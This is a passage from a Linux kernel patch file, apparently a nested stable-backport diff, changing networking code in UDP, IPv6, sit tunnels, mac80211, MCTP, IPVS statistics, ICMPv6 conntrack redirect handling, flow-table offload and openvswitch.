++	int error = -EADDRINUSE;
+ 
+ 	if (!snum) {
++		DECLARE_BITMAP(bitmap, PORTS_PER_CHAIN);
++		unsigned short first, last;
+ 		int low, high, remaining;
+ 		unsigned int rand;
+-		unsigned short first, last;
+-		DECLARE_BITMAP(bitmap, PORTS_PER_CHAIN);
+ 
+ 		inet_get_local_port_range(net, &low, &high);
+ 		remaining = (high - low) + 1;
+@@ -2518,10 +2518,13 @@ static struct sock *__udp4_lib_mcast_demux_lookup(struct net *net,
+ 						  __be16 rmt_port, __be32 rmt_addr,
+ 						  int dif, int sdif)
+ {
+-	struct sock *sk, *result;
+ 	unsigned short hnum = ntohs(loc_port);
+-	unsigned int slot = udp_hashfn(net, hnum, udp_table.mask);
+-	struct udp_hslot *hslot = &udp_table.hash[slot];
++	struct sock *sk, *result;
++	struct udp_hslot *hslot;
++	unsigned int slot;
++
++	slot = udp_hashfn(net, hnum, udp_table.mask);
++	hslot = &udp_table.hash[slot];
+ 
+ 	/* Do not bother scanning a too big list */
+ 	if (hslot->count > 10)
+@@ -2549,14 +2552,18 @@ static struct sock *__udp4_lib_demux_lookup(struct net *net,
+ 					    __be16 rmt_port, __be32 rmt_addr,
+ 					    int dif, int sdif)
+ {
+-	unsigned short hnum = ntohs(loc_port);
+-	unsigned int hash2 = ipv4_portaddr_hash(net, loc_addr, hnum);
+-	unsigned int slot2 = hash2 & udp_table.mask;
+-	struct udp_hslot *hslot2 = &udp_table.hash2[slot2];
+ 	INET_ADDR_COOKIE(acookie, rmt_addr, loc_addr);
+-	const __portpair ports = INET_COMBINED_PORTS(rmt_port, hnum);
++	unsigned short hnum = ntohs(loc_port);
++	unsigned int hash2, slot2;
++	struct udp_hslot *hslot2;
++	__portpair ports;
+ 	struct sock *sk;
+ 
++	hash2 = ipv4_portaddr_hash(net, loc_addr, hnum);
++	slot2 = hash2 & udp_table.mask;
++	hslot2 = &udp_table.hash2[slot2];
++	ports = INET_COMBINED_PORTS(rmt_port, hnum);
++
+ 	udp_portaddr_for_each_entry_rcu(sk, &hslot2->head) {
+ 		if (inet_match(net, sk, acookie, ports, dif, sdif))
+ 			return sk;
+@@ -2957,10 +2964,10 @@ EXPORT_SYMBOL(udp_prot);
+ 
+ static struct sock *udp_get_first(struct seq_file *seq, int start)
+ {
+-	struct sock *sk;
+-	struct udp_seq_afinfo *afinfo;
+ 	struct udp_iter_state *state = seq->private;
+ 	struct net *net = seq_file_net(seq);
++	struct udp_seq_afinfo *afinfo;
++	struct sock *sk;
+ 
+ 	if (state->bpf_seq_afinfo)
+ 		afinfo = state->bpf_seq_afinfo;
+@@ -2991,9 +2998,9 @@ found:
+ 
+ static struct sock *udp_get_next(struct seq_file *seq, struct sock *sk)
+ {
+-	struct udp_seq_afinfo *afinfo;
+ 	struct udp_iter_state *state = seq->private;
+ 	struct net *net = seq_file_net(seq);
++	struct udp_seq_afinfo *afinfo;
+ 
+ 	if (state->bpf_seq_afinfo)
+ 		afinfo = state->bpf_seq_afinfo;
+@@ -3049,8 +3056,8 @@ EXPORT_SYMBOL(udp_seq_next);
+ 
+ void udp_seq_stop(struct seq_file *seq, void *v)
+ {
+-	struct udp_seq_afinfo *afinfo;
+ 	struct udp_iter_state *state = seq->private;
++	struct udp_seq_afinfo *afinfo;
+ 
+ 	if (state->bpf_seq_afinfo)
+ 		afinfo = state->bpf_seq_afinfo;
+diff --git a/net/ipv4/udp_tunnel_core.c b/net/ipv4/udp_tunnel_core.c
+index 8242c8947340e..5f8104cf082d0 100644
+--- a/net/ipv4/udp_tunnel_core.c
++++ b/net/ipv4/udp_tunnel_core.c
+@@ -176,6 +176,7 @@ EXPORT_SYMBOL_GPL(udp_tunnel_xmit_skb);
+ void udp_tunnel_sock_release(struct socket *sock)
+ {
+ 	rcu_assign_sk_user_data(sock->sk, NULL);
++	synchronize_rcu();
+ 	kernel_sock_shutdown(sock, SHUT_RDWR);
+ 	sock_release(sock);
+ }
+diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
+index 0241910049825..7b0cd54da452b 100644
+--- a/net/ipv6/af_inet6.c
++++ b/net/ipv6/af_inet6.c
+@@ -409,10 +409,10 @@ static int __inet6_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len,
+ 	/* Make sure we are allowed to bind here. */
+ 	if (snum || !(inet->bind_address_no_port ||
+ 		      (flags & BIND_FORCE_ADDRESS_NO_PORT))) {
+-		if (sk->sk_prot->get_port(sk, snum)) {
++		err = sk->sk_prot->get_port(sk, snum);
++		if (err) {
+ 			sk->sk_ipv6only = saved_ipv6only;
+ 			inet_reset_saddr(sk);
+-			err = -EADDRINUSE;
+ 			goto out;
+ 		}
+ 		if (!(flags & BIND_FROM_BPF)) {
+diff --git a/net/ipv6/datagram.c b/net/ipv6/datagram.c
+index 5ecb56522f9d6..ba28aeb7cade0 100644
+--- a/net/ipv6/datagram.c
++++ b/net/ipv6/datagram.c
+@@ -42,24 +42,29 @@ static void ip6_datagram_flow_key_init(struct flowi6 *fl6, struct sock *sk)
+ {
+ 	struct inet_sock *inet = inet_sk(sk);
+ 	struct ipv6_pinfo *np = inet6_sk(sk);
++	int oif = sk->sk_bound_dev_if;
+ 
+ 	memset(fl6, 0, sizeof(*fl6));
+ 	fl6->flowi6_proto = sk->sk_protocol;
+ 	fl6->daddr = sk->sk_v6_daddr;
+ 	fl6->saddr = np->saddr;
+-	fl6->flowi6_oif = sk->sk_bound_dev_if;
+ 	fl6->flowi6_mark = sk->sk_mark;
+ 	fl6->fl6_dport = inet->inet_dport;
+ 	fl6->fl6_sport = inet->inet_sport;
+ 	fl6->flowlabel = np->flow_label;
+ 	fl6->flowi6_uid = sk->sk_uid;
+ 
+-	if (!fl6->flowi6_oif)
+-		fl6->flowi6_oif = np->sticky_pktinfo.ipi6_ifindex;
++	if (!oif)
++		oif = np->sticky_pktinfo.ipi6_ifindex;
+ 
+-	if (!fl6->flowi6_oif && ipv6_addr_is_multicast(&fl6->daddr))
+-		fl6->flowi6_oif = np->mcast_oif;
++	if (!oif) {
++		if (ipv6_addr_is_multicast(&fl6->daddr))
++			oif = np->mcast_oif;
++		else
++			oif = np->ucast_oif;
++	}
+ 
++	fl6->flowi6_oif = oif;
+ 	security_sk_classify_flow(sk, flowi6_to_flowi_common(fl6));
+ }
+ 
+diff --git a/net/ipv6/sit.c b/net/ipv6/sit.c
+index 5703d3cbea9ba..70d81bba50939 100644
+--- a/net/ipv6/sit.c
++++ b/net/ipv6/sit.c
+@@ -694,7 +694,7 @@ static int ipip6_rcv(struct sk_buff *skb)
+ 		skb->dev = tunnel->dev;
+ 
+ 		if (packet_is_spoofed(skb, iph, tunnel)) {
+-			tunnel->dev->stats.rx_errors++;
++			DEV_STATS_INC(tunnel->dev, rx_errors);
+ 			goto out;
+ 		}
+ 
+@@ -714,8 +714,8 @@ static int ipip6_rcv(struct sk_buff *skb)
+ 				net_info_ratelimited("non-ECT from %pI4 with TOS=%#x\n",
+ 						     &iph->saddr, iph->tos);
+ 			if (err > 1) {
+-				++tunnel->dev->stats.rx_frame_errors;
+-				++tunnel->dev->stats.rx_errors;
++				DEV_STATS_INC(tunnel->dev, rx_frame_errors);
++				DEV_STATS_INC(tunnel->dev, rx_errors);
+ 				goto out;
+ 			}
+ 		}
+@@ -942,7 +942,7 @@ static netdev_tx_t ipip6_tunnel_xmit(struct sk_buff *skb,
+ 	if (!rt) {
+ 		rt = ip_route_output_flow(tunnel->net, &fl4, NULL);
+ 		if (IS_ERR(rt)) {
+-			dev->stats.tx_carrier_errors++;
++			DEV_STATS_INC(dev, tx_carrier_errors);
+ 			goto tx_error_icmp;
+ 		}
+ 		dst_cache_set_ip4(&tunnel->dst_cache, &rt->dst, fl4.saddr);
+@@ -950,14 +950,14 @@ static netdev_tx_t ipip6_tunnel_xmit(struct sk_buff *skb,
+ 
+ 	if (rt->rt_type != RTN_UNICAST && rt->rt_type != RTN_LOCAL) {
+ 		ip_rt_put(rt);
+-		dev->stats.tx_carrier_errors++;
++		DEV_STATS_INC(dev, tx_carrier_errors);
+ 		goto tx_error_icmp;
+ 	}
+ 	tdev = rt->dst.dev;
+ 
+ 	if (tdev == dev) {
+ 		ip_rt_put(rt);
+-		dev->stats.collisions++;
++		DEV_STATS_INC(dev, collisions);
+ 		goto tx_error;
+ 	}
+ 
+@@ -970,7 +970,7 @@ static netdev_tx_t ipip6_tunnel_xmit(struct sk_buff *skb,
+ 		mtu = dst_mtu(&rt->dst) - t_hlen;
+ 
+ 		if (mtu < IPV4_MIN_MTU) {
+-			dev->stats.collisions++;
++			DEV_STATS_INC(dev, collisions);
+ 			ip_rt_put(rt);
+ 			goto tx_error;
+ 		}
+@@ -1009,7 +1009,7 @@ static netdev_tx_t ipip6_tunnel_xmit(struct sk_buff *skb,
+ 		struct sk_buff *new_skb = skb_realloc_headroom(skb, max_headroom);
+ 		if (!new_skb) {
+ 			ip_rt_put(rt);
+-			dev->stats.tx_dropped++;
++			DEV_STATS_INC(dev, tx_dropped);
+ 			kfree_skb(skb);
+ 			return NETDEV_TX_OK;
+ 		}
+@@ -1039,7 +1039,7 @@ tx_error_icmp:
+ 	dst_link_failure(skb);
+ tx_error:
+ 	kfree_skb(skb);
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	return NETDEV_TX_OK;
+ }
+ 
+@@ -1058,7 +1058,7 @@ static netdev_tx_t sit_tunnel_xmit__(struct sk_buff *skb,
+ 	return NETDEV_TX_OK;
+ tx_error:
+ 	kfree_skb(skb);
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	return NETDEV_TX_OK;
+ }
+ 
+@@ -1087,7 +1087,7 @@ static netdev_tx_t sit_tunnel_xmit(struct sk_buff *skb,
+ 	return NETDEV_TX_OK;
+ 
+ tx_err:
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	kfree_skb(skb);
+ 	return NETDEV_TX_OK;
+ 
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index bc65e5b7195b3..98a64e8d9bdaa 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -1063,12 +1063,16 @@ static struct sock *__udp6_lib_demux_lookup(struct net *net,
+ 			int dif, int sdif)
+ {
+ 	unsigned short hnum = ntohs(loc_port);
+-	unsigned int hash2 = ipv6_portaddr_hash(net, loc_addr, hnum);
+-	unsigned int slot2 = hash2 & udp_table.mask;
+-	struct udp_hslot *hslot2 = &udp_table.hash2[slot2];
+-	const __portpair ports = INET_COMBINED_PORTS(rmt_port, hnum);
++	unsigned int hash2, slot2;
++	struct udp_hslot *hslot2;
++	__portpair ports;
+ 	struct sock *sk;
+ 
++	hash2 = ipv6_portaddr_hash(net, loc_addr, hnum);
++	slot2 = hash2 & udp_table.mask;
++	hslot2 = &udp_table.hash2[slot2];
++	ports = INET_COMBINED_PORTS(rmt_port, hnum);
++
+ 	udp_portaddr_for_each_entry_rcu(sk, &hslot2->head) {
+ 		if (sk->sk_state == TCP_ESTABLISHED &&
+ 		    inet6_match(net, sk, rmt_addr, loc_addr, ports, dif, sdif))
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 687b4c878d4ad..8c8ef87997a8a 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -576,7 +576,7 @@ static struct ieee80211_key *
+ ieee80211_lookup_key(struct ieee80211_sub_if_data *sdata, int link_id,
+ 		     u8 key_idx, bool pairwise, const u8 *mac_addr)
+ {
+-	struct ieee80211_local *local = sdata->local;
++	struct ieee80211_local *local __maybe_unused = sdata->local;
+ 	struct ieee80211_link_data *link = &sdata->deflink;
+ 	struct ieee80211_key *key;
+ 
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index a842f2e1c2309..de7b8a4d4bbbb 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -390,6 +390,7 @@ struct ieee80211_mgd_auth_data {
+ 	bool done, waiting;
+ 	bool peer_confirmed;
+ 	bool timeout_started;
++	int link_id;
+ 
+ 	u8 ap_addr[ETH_ALEN] __aligned(2);
+ 
+diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c
+index dd9ac1f7d2ea6..46f08ec5ed760 100644
+--- a/net/mac80211/iface.c
++++ b/net/mac80211/iface.c
+@@ -2258,6 +2258,7 @@ int ieee80211_if_add(struct ieee80211_local *local, const char *name,
+ 
+ 		ret = cfg80211_register_netdevice(ndev);
+ 		if (ret) {
++			ieee80211_if_free(ndev);
+ 			free_netdev(ndev);
+ 			return ret;
+ 		}
+diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
+index d8484cd870de5..0125b3e6175b7 100644
+--- a/net/mac80211/mlme.c
++++ b/net/mac80211/mlme.c
+@@ -5033,6 +5033,7 @@ static void ieee80211_rx_mgmt_assoc_resp(struct ieee80211_sub_if_data *sdata,
+ 	struct cfg80211_rx_assoc_resp resp = {
+ 		.uapsd_queues = -1,
+ 	};
++	u8 ap_mld_addr[ETH_ALEN] __aligned(2);
+ 	unsigned int link_id;
+ 
+ 	sdata_assert_lock(sdata);
+@@ -5199,6 +5200,11 @@ static void ieee80211_rx_mgmt_assoc_resp(struct ieee80211_sub_if_data *sdata,
+ 				resp.uapsd_queues |= ieee80211_ac_to_qos_mask[ac];
+ 	}
+ 
++	if (sdata->vif.valid_links) {
++		ether_addr_copy(ap_mld_addr, sdata->vif.cfg.ap_addr);
++		resp.ap_mld_addr = ap_mld_addr;
++	}
++
+ 	ieee80211_destroy_assoc_data(sdata,
+ 				     status_code == WLAN_STATUS_SUCCESS ?
+ 					ASSOC_SUCCESS :
+@@ -5208,8 +5214,6 @@ static void ieee80211_rx_mgmt_assoc_resp(struct ieee80211_sub_if_data *sdata,
+ 	resp.len = len;
+ 	resp.req_ies = ifmgd->assoc_req_ies;
+ 	resp.req_ies_len = ifmgd->assoc_req_ies_len;
+-	if (sdata->vif.valid_links)
+-		resp.ap_mld_addr = sdata->vif.cfg.ap_addr;
+ 	cfg80211_rx_assoc_resp(sdata->dev, &resp);
+ notify_driver:
+ 	drv_mgd_complete_tx(sdata->local, sdata, &info);
+@@ -6640,6 +6644,7 @@ int ieee80211_mgd_auth(struct ieee80211_sub_if_data *sdata,
+ 	       req->ap_mld_addr ?: req->bss->bssid,
+ 	       ETH_ALEN);
+ 	auth_data->bss = req->bss;
++	auth_data->link_id = req->link_id;
+ 
+ 	if (req->auth_data_len >= 4) {
+ 		if (req->auth_type == NL80211_AUTHTYPE_SAE) {
+@@ -6658,7 +6663,8 @@ int ieee80211_mgd_auth(struct ieee80211_sub_if_data *sdata,
+ 	 * removal and re-addition of the STA entry in
+ 	 * ieee80211_prep_connection().
+ 	 */
+-	cont_auth = ifmgd->auth_data && req->bss == ifmgd->auth_data->bss;
++	cont_auth = ifmgd->auth_data && req->bss == ifmgd->auth_data->bss &&
++		    ifmgd->auth_data->link_id == req->link_id;
+ 
+ 	if (req->ie && req->ie_len) {
+ 		memcpy(&auth_data->data[auth_data->data_len],
+@@ -6982,7 +6988,8 @@ int ieee80211_mgd_assoc(struct ieee80211_sub_if_data *sdata,
+ 
+ 		/* keep sta info, bssid if matching */
+ 		match = ether_addr_equal(ifmgd->auth_data->ap_addr,
+-					 assoc_data->ap_addr);
++					 assoc_data->ap_addr) &&
++			ifmgd->auth_data->link_id == req->link_id;
+ 		ieee80211_destroy_auth_data(sdata, match);
+ 	}
+ 
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 874f2a4d831d0..cc10ee1ff8e93 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -2973,7 +2973,7 @@ static struct sk_buff *ieee80211_build_hdr(struct ieee80211_sub_if_data *sdata,
+ 
+ 		if (pre_conf_link_id != link_id &&
+ 		    link_id != IEEE80211_LINK_UNSPECIFIED) {
+-#ifdef CPTCFG_MAC80211_VERBOSE_DEBUG
++#ifdef CONFIG_MAC80211_VERBOSE_DEBUG
+ 			net_info_ratelimited("%s: dropped frame to %pM with bad link ID request (%d vs. %d)\n",
+ 					     sdata->name, hdr.addr1,
+ 					     pre_conf_link_id, link_id);
+diff --git a/net/mctp/device.c b/net/mctp/device.c
+index 99a3bda8852f8..acb97b2574289 100644
+--- a/net/mctp/device.c
++++ b/net/mctp/device.c
+@@ -429,12 +429,6 @@ static void mctp_unregister(struct net_device *dev)
+ 	struct mctp_dev *mdev;
+ 
+ 	mdev = mctp_dev_get_rtnl(dev);
+-	if (mdev && !mctp_known(dev)) {
+-		// Sanity check, should match what was set in mctp_register
+-		netdev_warn(dev, "%s: BUG mctp_ptr set for unknown type %d",
+-			    __func__, dev->type);
+-		return;
+-	}
+ 	if (!mdev)
+ 		return;
+ 
+@@ -451,14 +445,8 @@ static int mctp_register(struct net_device *dev)
+ 	struct mctp_dev *mdev;
+ 
+ 	/* Already registered? */
+-	mdev = rtnl_dereference(dev->mctp_ptr);
+-
+-	if (mdev) {
+-		if (!mctp_known(dev))
+-			netdev_warn(dev, "%s: BUG mctp_ptr set for unknown type %d",
+-				    __func__, dev->type);
++	if (rtnl_dereference(dev->mctp_ptr))
+ 		return 0;
+-	}
+ 
+ 	/* only register specific types */
+ 	if (!mctp_known(dev))
+diff --git a/net/netfilter/ipvs/ip_vs_core.c b/net/netfilter/ipvs/ip_vs_core.c
+index 51ad557a525b5..b5ae419661b80 100644
+--- a/net/netfilter/ipvs/ip_vs_core.c
++++ b/net/netfilter/ipvs/ip_vs_core.c
+@@ -132,21 +132,21 @@ ip_vs_in_stats(struct ip_vs_conn *cp, struct sk_buff *skb)
+ 
+ 		s = this_cpu_ptr(dest->stats.cpustats);
+ 		u64_stats_update_begin(&s->syncp);
+-		s->cnt.inpkts++;
+-		s->cnt.inbytes += skb->len;
++		u64_stats_inc(&s->cnt.inpkts);
++		u64_stats_add(&s->cnt.inbytes, skb->len);
+ 		u64_stats_update_end(&s->syncp);
+ 
+ 		svc = rcu_dereference(dest->svc);
+ 		s = this_cpu_ptr(svc->stats.cpustats);
+ 		u64_stats_update_begin(&s->syncp);
+-		s->cnt.inpkts++;
+-		s->cnt.inbytes += skb->len;
++		u64_stats_inc(&s->cnt.inpkts);
++		u64_stats_add(&s->cnt.inbytes, skb->len);
+ 		u64_stats_update_end(&s->syncp);
+ 
+ 		s = this_cpu_ptr(ipvs->tot_stats.cpustats);
+ 		u64_stats_update_begin(&s->syncp);
+-		s->cnt.inpkts++;
+-		s->cnt.inbytes += skb->len;
++		u64_stats_inc(&s->cnt.inpkts);
++		u64_stats_add(&s->cnt.inbytes, skb->len);
+ 		u64_stats_update_end(&s->syncp);
+ 
+ 		local_bh_enable();
+@@ -168,21 +168,21 @@ ip_vs_out_stats(struct ip_vs_conn *cp, struct sk_buff *skb)
+ 
+ 		s = this_cpu_ptr(dest->stats.cpustats);
+ 		u64_stats_update_begin(&s->syncp);
+-		s->cnt.outpkts++;
+-		s->cnt.outbytes += skb->len;
++		u64_stats_inc(&s->cnt.outpkts);
++		u64_stats_add(&s->cnt.outbytes, skb->len);
+ 		u64_stats_update_end(&s->syncp);
+ 
+ 		svc = rcu_dereference(dest->svc);
+ 		s = this_cpu_ptr(svc->stats.cpustats);
+ 		u64_stats_update_begin(&s->syncp);
+-		s->cnt.outpkts++;
+-		s->cnt.outbytes += skb->len;
++		u64_stats_inc(&s->cnt.outpkts);
++		u64_stats_add(&s->cnt.outbytes, skb->len);
+ 		u64_stats_update_end(&s->syncp);
+ 
+ 		s = this_cpu_ptr(ipvs->tot_stats.cpustats);
+ 		u64_stats_update_begin(&s->syncp);
+-		s->cnt.outpkts++;
+-		s->cnt.outbytes += skb->len;
++		u64_stats_inc(&s->cnt.outpkts);
++		u64_stats_add(&s->cnt.outbytes, skb->len);
+ 		u64_stats_update_end(&s->syncp);
+ 
+ 		local_bh_enable();
+@@ -200,17 +200,17 @@ ip_vs_conn_stats(struct ip_vs_conn *cp, struct ip_vs_service *svc)
+ 
+ 	s = this_cpu_ptr(cp->dest->stats.cpustats);
+ 	u64_stats_update_begin(&s->syncp);
+-	s->cnt.conns++;
++	u64_stats_inc(&s->cnt.conns);
+ 	u64_stats_update_end(&s->syncp);
+ 
+ 	s = this_cpu_ptr(svc->stats.cpustats);
+ 	u64_stats_update_begin(&s->syncp);
+-	s->cnt.conns++;
++	u64_stats_inc(&s->cnt.conns);
+ 	u64_stats_update_end(&s->syncp);
+ 
+ 	s = this_cpu_ptr(ipvs->tot_stats.cpustats);
+ 	u64_stats_update_begin(&s->syncp);
+-	s->cnt.conns++;
++	u64_stats_inc(&s->cnt.conns);
+ 	u64_stats_update_end(&s->syncp);
+ 
+ 	local_bh_enable();
+diff --git a/net/netfilter/ipvs/ip_vs_ctl.c b/net/netfilter/ipvs/ip_vs_ctl.c
+index 988222fff9f02..03af6a2ffd567 100644
+--- a/net/netfilter/ipvs/ip_vs_ctl.c
++++ b/net/netfilter/ipvs/ip_vs_ctl.c
+@@ -2297,11 +2297,11 @@ static int ip_vs_stats_percpu_show(struct seq_file *seq, void *v)
+ 
+ 		do {
+ 			start = u64_stats_fetch_begin_irq(&u->syncp);
+-			conns = u->cnt.conns;
+-			inpkts = u->cnt.inpkts;
+-			outpkts = u->cnt.outpkts;
+-			inbytes = u->cnt.inbytes;
+-			outbytes = u->cnt.outbytes;
++			conns = u64_stats_read(&u->cnt.conns);
++			inpkts = u64_stats_read(&u->cnt.inpkts);
++			outpkts = u64_stats_read(&u->cnt.outpkts);
++			inbytes = u64_stats_read(&u->cnt.inbytes);
++			outbytes = u64_stats_read(&u->cnt.outbytes);
+ 		} while (u64_stats_fetch_retry_irq(&u->syncp, start));
+ 
+ 		seq_printf(seq, "%3X %8LX %8LX %8LX %16LX %16LX\n",
+diff --git a/net/netfilter/ipvs/ip_vs_est.c b/net/netfilter/ipvs/ip_vs_est.c
+index 9a1a7af6a186a..f53150d82a92d 100644
+--- a/net/netfilter/ipvs/ip_vs_est.c
++++ b/net/netfilter/ipvs/ip_vs_est.c
+@@ -67,11 +67,11 @@ static void ip_vs_read_cpu_stats(struct ip_vs_kstats *sum,
+ 		if (add) {
+ 			do {
+ 				start = u64_stats_fetch_begin(&s->syncp);
+-				conns = s->cnt.conns;
+-				inpkts = s->cnt.inpkts;
+-				outpkts = s->cnt.outpkts;
+-				inbytes = s->cnt.inbytes;
+-				outbytes = s->cnt.outbytes;
++				conns = u64_stats_read(&s->cnt.conns);
++				inpkts = u64_stats_read(&s->cnt.inpkts);
++				outpkts = u64_stats_read(&s->cnt.outpkts);
++				inbytes = u64_stats_read(&s->cnt.inbytes);
++				outbytes = u64_stats_read(&s->cnt.outbytes);
+ 			} while (u64_stats_fetch_retry(&s->syncp, start));
+ 			sum->conns += conns;
+ 			sum->inpkts += inpkts;
+@@ -82,11 +82,11 @@ static void ip_vs_read_cpu_stats(struct ip_vs_kstats *sum,
+ 			add = true;
+ 			do {
+ 				start = u64_stats_fetch_begin(&s->syncp);
+-				sum->conns = s->cnt.conns;
+-				sum->inpkts = s->cnt.inpkts;
+-				sum->outpkts = s->cnt.outpkts;
+-				sum->inbytes = s->cnt.inbytes;
+-				sum->outbytes = s->cnt.outbytes;
++				sum->conns = u64_stats_read(&s->cnt.conns);
++				sum->inpkts = u64_stats_read(&s->cnt.inpkts);
++				sum->outpkts = u64_stats_read(&s->cnt.outpkts);
++				sum->inbytes = u64_stats_read(&s->cnt.inbytes);
++				sum->outbytes = u64_stats_read(&s->cnt.outbytes);
+ 			} while (u64_stats_fetch_retry(&s->syncp, start));
+ 		}
+ 	}
+diff --git a/net/netfilter/nf_conntrack_proto_icmpv6.c b/net/netfilter/nf_conntrack_proto_icmpv6.c
+index 61e3b05cf02c3..1020d67600a95 100644
+--- a/net/netfilter/nf_conntrack_proto_icmpv6.c
++++ b/net/netfilter/nf_conntrack_proto_icmpv6.c
+@@ -129,6 +129,56 @@ static void icmpv6_error_log(const struct sk_buff *skb,
+ 	nf_l4proto_log_invalid(skb, state, IPPROTO_ICMPV6, "%s", msg);
+ }
+ 
++static noinline_for_stack int
++nf_conntrack_icmpv6_redirect(struct nf_conn *tmpl, struct sk_buff *skb,
++			     unsigned int dataoff,
++			     const struct nf_hook_state *state)
++{
++	u8 hl = ipv6_hdr(skb)->hop_limit;
++	union nf_inet_addr outer_daddr;
++	union {
++		struct nd_opt_hdr nd_opt;
++		struct rd_msg rd_msg;
++	} tmp;
++	const struct nd_opt_hdr *nd_opt;
++	const struct rd_msg *rd_msg;
++
++	rd_msg = skb_header_pointer(skb, dataoff, sizeof(*rd_msg), &tmp.rd_msg);
++	if (!rd_msg) {
++		icmpv6_error_log(skb, state, "short redirect");
++		return -NF_ACCEPT;
++	}
++
++	if (rd_msg->icmph.icmp6_code != 0)
++		return NF_ACCEPT;
++
++	if (hl != 255 || !(ipv6_addr_type(&ipv6_hdr(skb)->saddr) & IPV6_ADDR_LINKLOCAL)) {
++		icmpv6_error_log(skb, state, "invalid saddr or hoplimit for redirect");
++		return -NF_ACCEPT;
++	}
++
++	dataoff += sizeof(*rd_msg);
++
++	/* warning: rd_msg no longer usable after this call */
++	nd_opt = skb_header_pointer(skb, dataoff, sizeof(*nd_opt), &tmp.nd_opt);
++	if (!nd_opt || nd_opt->nd_opt_len == 0) {
++		icmpv6_error_log(skb, state, "redirect without options");
++		return -NF_ACCEPT;
++	}
++
++	/* We could call ndisc_parse_options(), but it would need
++	 * skb_linearize() and a bit more work.
++	 */
++	if (nd_opt->nd_opt_type != ND_OPT_REDIRECT_HDR)
++		return NF_ACCEPT;
++
++	memcpy(&outer_daddr.ip6, &ipv6_hdr(skb)->daddr,
++	       sizeof(outer_daddr.ip6));
++	dataoff += 8;
++	return nf_conntrack_inet_error(tmpl, skb, dataoff, state,
++				       IPPROTO_ICMPV6, &outer_daddr);
++}
++
+ int nf_conntrack_icmpv6_error(struct nf_conn *tmpl,
+ 			      struct sk_buff *skb,
+ 			      unsigned int dataoff,
+@@ -159,6 +209,9 @@ int nf_conntrack_icmpv6_error(struct nf_conn *tmpl,
+ 		return NF_ACCEPT;
+ 	}
+ 
++	if (icmp6h->icmp6_type == NDISC_REDIRECT)
++		return nf_conntrack_icmpv6_redirect(tmpl, skb, dataoff, state);
++
+ 	/* is not error message ? */
+ 	if (icmp6h->icmp6_type >= 128)
+ 		return NF_ACCEPT;
+diff --git a/net/netfilter/nf_flow_table_offload.c b/net/netfilter/nf_flow_table_offload.c
+index 0fdcdb2c9ae43..4d9b99abe37d6 100644
+--- a/net/netfilter/nf_flow_table_offload.c
++++ b/net/netfilter/nf_flow_table_offload.c
+@@ -383,12 +383,12 @@ static void flow_offload_ipv6_mangle(struct nf_flow_rule *flow_rule,
+ 				     const __be32 *addr, const __be32 *mask)
+ {
+ 	struct flow_action_entry *entry;
+-	int i, j;
++	int i;
+ 
+-	for (i = 0, j = 0; i < sizeof(struct in6_addr) / sizeof(u32); i += sizeof(u32), j++) {
++	for (i = 0; i < sizeof(struct in6_addr) / sizeof(u32); i++) {
+ 		entry = flow_action_entry_next(flow_rule);
+ 		flow_offload_mangle(entry, FLOW_ACT_MANGLE_HDR_TYPE_IP6,
+-				    offset + i, &addr[j], mask);
++				    offset + i * sizeof(u32), &addr[i], mask);
+ 	}
+ }
+ 
+diff --git a/net/openvswitch/datapath.c b/net/openvswitch/datapath.c
+index 8b84869eb2ac7..fa0f1952d7637 100644
+--- a/net/openvswitch/datapath.c
++++ b/net/openvswitch/datapath.c
+@@ -948,6 +948,7 @@ static int ovs_flow_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 	struct sw_flow_mask mask;
+ 	struct sk_buff *reply;
+ 	struct datapath *dp;
++	struct sw_flow_key *key;
+ 	struct sw_flow_actions *acts;
+ 	struct sw_flow_match match;
+ 	u32 ufid_flags = ovs_nla_get_ufid_flags(a[OVS_FLOW_ATTR_UFID_FLAGS]);
+@@ -975,24 +976,26 @@ static int ovs_flow_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 	}
+ 
+ 	/* Extract key. */
+-	ovs_match_init(&match, &new_flow->key, false, &mask);
++	key = kzalloc(sizeof(*key), GFP_KERNEL);
++	if (!key) {
++		error = -ENOMEM;
++		goto err_kfree_key;
++	}
++
++	ovs_match_init(&match, key, false, &mask);
+ 	error = ovs_nla_get_match(net, &match, a[OVS_FLOW_ATTR_KEY],
+ 				  a[OVS_FLOW_ATTR_MASK], log);
+ 	if (error)
+ 		goto err_kfree_flow;
+ 
++	ovs_flow_mask_key(&new_flow->key, key, true, &mask);
++
+ 	/* Extract flow identifier. */
+ 	error = ovs_nla_get_identifier(&new_flow->id, a[OVS_FLOW_ATTR_UFID],
+-				       &new_flow->key, log);
++				       key, log);
+ 	if (error)
+ 		goto err_kfree_flow;
+ 
+-	/* unmasked key is needed to match when ufid is not used. */
+-	if (ovs_identifier_is_key(&new_flow->id))
+-		match.key = new_flow->id.unmasked_key;
+-
+-	ovs_flow_mask_key(&new_flow->key, &new_flow->key, true, &mask);
+-
+ 	/* Validate actions. */
+ 	error = ovs_nla_copy_actions(net, a[OVS_FLOW_ATTR_ACTIONS],
+ 				     &new_flow->key, &acts, log);
+@@ -1019,7 +1022,7 @@ static int ovs_flow_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 	if (ovs_identifier_is_ufid(&new_flow->id))
+ 		flow = ovs_flow_tbl_lookup_ufid(&dp->table, &new_flow->id);
+ 	if (!flow)
+-		flow = ovs_flow_tbl_lookup(&dp->table, &new_flow->key);
++		flow = ovs_flow_tbl_lookup(&dp->table, key);
+ 	if (likely(!flow)) {
